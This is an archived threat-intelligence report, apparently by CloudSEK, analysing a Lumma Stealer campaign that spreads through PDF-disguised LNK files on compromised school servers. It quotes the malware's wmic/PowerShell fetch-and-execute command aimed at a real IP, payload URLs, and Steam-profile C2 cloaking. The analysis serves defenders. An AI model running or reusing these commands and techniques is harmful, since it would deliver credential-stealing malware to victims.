{
	"id": "c55bdb0b-85f8-48dc-86fe-02150f8ea368",
	"created_at": "2026-04-06T03:35:55.909225Z",
	"updated_at": "2026-04-10T03:21:25.527964Z",
	"deleted_at": null,
	"sha1_hash": "fb101f5144fa5c7fb5eb4f627aacb92b07804175",
	"title": "Lumma Stealer Chronicles: PDF-themed Campaign Using Compromised Educational Institutions' Infrastructure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1922403,
	"plain_text": "Lumma Stealer Chronicles: PDF-themed Campaign Using\r\nCompromised Educational Institutions' Infrastructure\r\nBy Mayank Sahariya\r\nPublished: 2025-08-21 · Archived: 2026-04-06 03:11:57 UTC\r\nExecutive Summary\r\nLumma Stealer is an information-stealing malware offered through a Malware-as-a-Service (MaaS) platform. It is\r\ndesigned to steal sensitive data, including passwords, browser information, and cryptocurrency wallet details.\r\nThis report details an ongoing malware campaign distributing the Lumma Stealer information stealer. The\r\ncampaign's primary infection vector involves using malicious LNK (shortcut) files that are crafted to appear as\r\nlegitimate PDF documents. These LNK files, when executed, initiate a multi-stage infection process ultimately\r\nleading to the deployment of Lumma Stealer on the victim's machine. The campaign focuses on tricking users into\r\nexecuting malicious files, highlighting the importance of user awareness and robust security measures. Malware\r\ncampaign targets multiple industries, including Education \u0026 Academia, Corporate \u0026 Business, Government \u0026\r\nLegal, Healthcare \u0026 Pharmaceuticals, Financial \u0026 Banking, Engineering \u0026 Manufacturing, Technology \u0026\r\nBlockchain, and Media \u0026 Journalism.\r\nPreviously, we published two in-depth research reports analyzing the Lumma Stealer campaign, detailing its\r\ntactics, techniques, and procedures (TTPs) used by threat actors to distribute and deploy the malware.\r\nHow Threat Actors Exploit Brand Collaborations to Target Popular YouTube Channels\r\nUnmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages\r\nmind map of the campaign\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 1 of 8\n\nAttribution and Analysis\r\nDuring a drive-by compromise, the user is initially redirected to a WebDAV server while visiting certain\r\nwebsites, unknowingly establishing a connection. This redirection may trigger an explorer.exe window preview,\r\ndisplaying the contents of the WebDAV server, which hosts malicious files designed to exploit system\r\nvulnerabilities or deliver malware. \r\nIn the analyzed infrastructure, malicious files were hosted on a WebDAV server within the open directory\r\n“http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”, When a user clicks to download the school fee structure, they unknowingly download a\r\nmalicious \"pdf.lnk\" file, which appears as a PDF due to its icon.\r\nUsers click on the PDF to download\r\nThe directory primarily contained “.lnk” file, which were weaponized to download additional malicious\r\npayloads using “mshta.exe”, a legitimate Microsoft executable designed to run Microsoft HTML Application\r\n(HTA) files.\r\nLNK (shortcut) files are often leveraged as an entry point in phishing campaigns. By exploiting their\r\nunique features, threat actors can deceive users and bypass security measures, making them effective\r\ntools for infiltrating systems and networks.\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 2 of 8\n\nThe LNK file runs a PowerShell command that connects to a remote server, triggering the next stage of the\r\nattack. “C:\\Windows\\System32\\Wbem\\wmic.exe process call create \"powershell iex '\\*i*\\S*3*\\m*ta.e*\r\nhttps://80.76.51.231/Samarik' | powershell -\"\r\nPowershell script in Lnk file\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 3 of 8\n\nThese deceptive shortcuts, often camouflaged as legitimate executables or PDF files, entice unsuspecting users to\r\nclick, ultimately compromising their systems or networks.\r\nWe extracted the script by dumping the overlay section, revealing an obfuscated JavaScript code. \r\nScript in overlay\r\nObfuscated JavaScript code in overlay section of Samarik\r\nJava Script in Overlay Section\r\nThis function evaluates the JavaScript code stored in the variable aeQ. The use of eval is a common technique in\r\nobfuscated or malicious scripts.\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 4 of 8\n\nMshta Executes the Java Script\r\nA PowerShell script can be seen through the obfuscated JS script. An AES-encrypted payload and a procedure to\r\ndecrypt it in CBC mode using a hardcoded decryption key are included in this PowerShell script. Simple\r\nmathematical obfuscation techniques are also used in the script. \r\nEncrypted Powershell Script\r\nThe PowerShell script's normalized variables and functions show how the payload is downloaded and executed.\r\nDecrypted and Normalized PS Script\r\nThe final PowerShell script downloads extract the contents and execute “Kompass-4.1.2.exe” (Lumma Stealer)\r\nfrom https[:]//80.76.51[.]231/Kompass-4.1.2.exe\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 5 of 8\n\nLumma Stealer attempts to connect with command and control (C2) servers to exfiltrate stolen data after infecting\r\na system. It tries to reach multiple C2 server domains; however, these servers are currently inaccessible.\r\nMalware communicates with c2’s and steamcommunity\r\nThe sample uses the Steam connection if it cannot access every C2 domain it owns. Steam URLs differ from C2\r\ndomains in that they have distinct decryption techniques and are stored as execution codes.\r\nhxxps://steamcommunity.com/profiles/76561199724331900\r\nThe number 76561199724331900 follows the format of a Steam64 ID, suggesting that a Steam client or game\r\nmight be attempting to resolve a network service. This indicates that a device on the network is trying to resolve a\r\nname (likely related to a Steam session or game server). The profile was created on June 28, 2024.\r\nC2 cloaking via Steam profiles is a sophisticated evasion technique that abuses a trusted platform for stealthy\r\ncommand \u0026 control communication.\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 6 of 8\n\nSteam Profile Account “76561199724331900”\r\nThe threat actor most likely constructed this Steam URL, which is a profile page for a Steam account. The sample\r\nfirst connects to the website, parses the \"actual_persona_name\" tag to extract strings, and then uses the Caesar\r\ncipher method to decrypt the strings and extract C2 domains. \r\nHTML class of steam\r\nBased on analyzing different names mimicking legitimate PDF documents (e.g., contracts, financial reports,\r\nacademic materials, and technical brochures), Lumma Stealer malware targets industries including but not limited\r\nto Education \u0026 Academia, Corporate \u0026 Business, Government \u0026 Legal, Healthcare \u0026 Pharmaceuticals, Financial\r\n\u0026 Banking, Engineering \u0026 Manufacturing, Technology \u0026 Blockchain, and Media \u0026 Journalism.\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 7 of 8\n\nDifferent names mimicking legitimate PDF documents\r\nSource: https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastru\r\ncture\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure"
	],
	"report_names": [
		"lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure"
	],
	"threat_actors": [],
	"ts_created_at": 1775446555,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb101f5144fa5c7fb5eb4f627aacb92b07804175.pdf",
		"text": "https://archive.orkl.eu/fb101f5144fa5c7fb5eb4f627aacb92b07804175.txt",
		"img": "https://archive.orkl.eu/fb101f5144fa5c7fb5eb4f627aacb92b07804175.jpg"
	}
}